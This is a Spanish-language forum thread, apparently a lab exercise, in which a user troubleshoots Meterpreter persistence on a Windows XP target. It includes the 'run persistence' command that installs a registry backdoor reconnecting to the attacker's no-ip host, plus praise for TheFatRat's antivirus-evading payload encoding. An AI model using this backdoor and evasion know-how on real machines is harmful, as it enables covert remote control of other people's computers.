buenas,otra vez aqui ::)
el caso es que no logro persistencia con el payload y he probado todo lo que por ahora se y he leido.........
creo el payload-lo ejecuto en el ordenata victima-se crea la sesion de meterpreter-migro la sesion al explorer.exe
migrate pid (pid es el numero de proceso que corresponde al explorer.exe)
luego para obtener persistencia ejecuto el comando:
run persistence -U -p 6666 -r mi-noip -i 15
me dice que se a añadido la clave (aqui el nombre e la clave) a HKCU\software\windows\current version......run
hasta aqui todo bien, el caso es que al reiniciar el ordenador victima y ejecutar el mutihandler.......se queda esperando iniciar la sesion,pero no inicia.
luego despues de reinicar me sale en el ordenador victima un mensaje:
microsoft script host
secuncia de comando : C:DOCUME-1/usuario/CONFIG-/temp/bcdjvfdvwdvwg.vbs
linea19
caracter:2
error: el archivo ya existe
codigo:800A003A
origen : error de microsoft vbscript en tiempo de ejecucion
si ejecuto otra vez el payload se crea la sesion de meterpeter ,aclaro que el payload lo cree con el programa THEFATRAT
https://github.com/Screetsec/TheFatRat
ordenador victima xp-pro con sp3 ,antivirus desactivado y firewall del xp activado
atacante kali 2016.2
Muy buenas te agradeceria que facilitases capturas de pantalla de lo que te ocurra ya que de esa manera lo podremos entender mejor y podremos ayudarte de todas maneras yo postee como crear un backdoor que nos genere persistencia te dejo el link del post
https://underc0de.org/foro/hacking/backdoor-con-meterpreter/ (https://underc0de.org/foro/hacking/backdoor-con-meterpreter/)
Un saludo
he visto tus post y me han ayudado asi que lo primero agradecerte tu informacion
luego decirte que elproblema persiste incluso probando tu sistema de persistencia.....para reconectar tengo que ejecutar el payload otra vez.....y claro.....
imagen del error
http://imgur.com/a/MulXD
como puedes ver tengo varios xxxxxxxxxxxxxxxx.vbs de varias persistencias creadas y ninguna reconecta
De nada barbas, mas me alegra ami saber que te ha servido de algo :-)
El caso, prueba reiniciar toda tu PoC, quiero decir reinicia tu maquina atacante y tu maquina victima reinicia el escenario y empieza otra vez el ataque, cuando hayas conseguido penetrar en la maquina vuelve hacerlo, es decir, cuando consigas la sesion de meterpreter, tira el run persistence como lo hice yo, luego salte de la sesion de meterpreter y reinciar la segunda sesion desde meterpreter, vamos como dice el post.
Es lo unico que se me ocurre decirte
Un saludo Barbas :-)
bueno por fin ya esta todo en orden me explico para el que le pueda interesar:
despues de probar el sistema del compañero d0r127 seguia igual :'( asi que maximice todas las ventanas para ver mejor el proceso y me di cuenta de una cosa.
como puse en el primer post, el payload lo habia creado con the fat rat, puse el enlace........y hay estaba el error , por supuesto mio por no fijarme bien,
el programa the fat rat automatiza el proceso de crear listener, payloads......pero al crear la persistencia me he dado cuenta que la crea respetando el lhost en este caso mi-no-ip, PERO NO EL LPORT usa por defecto el puerto 4444 , tipico en esos casos pero no era mi puerto, por lo cual siempre se quedaba a la escucha y solo reconectaba al ejecutar otra vez el payload en el ordenador victima, y claro asi va a ser que no..........
visto lo cual he ejecutado el payload creado con the-fat-rat pero a la escucha estaba el listener del metasploit y a conectado todo bien.....,luego acto seguido he creado la persistencia con el metodo-configuracion del compañero d0r127 y he reinciado el ordenador victima y voila, a reconectado sin mas, y sin mostrar el error de
http://imgur.com/a/MulXD
asi que podemos decir que ya esta ,cabe decir que use the fat rat por la opcion de codificacion del payload (powerfull fud.exe) que lo deja practicamente fud
siento no poder poner imagenes pero estoy con demasiadas cosas a la vez ............
solo me cabe dar las gracias a todos y en este caso especialmente a d0r127 por su interes info y paciencia ;D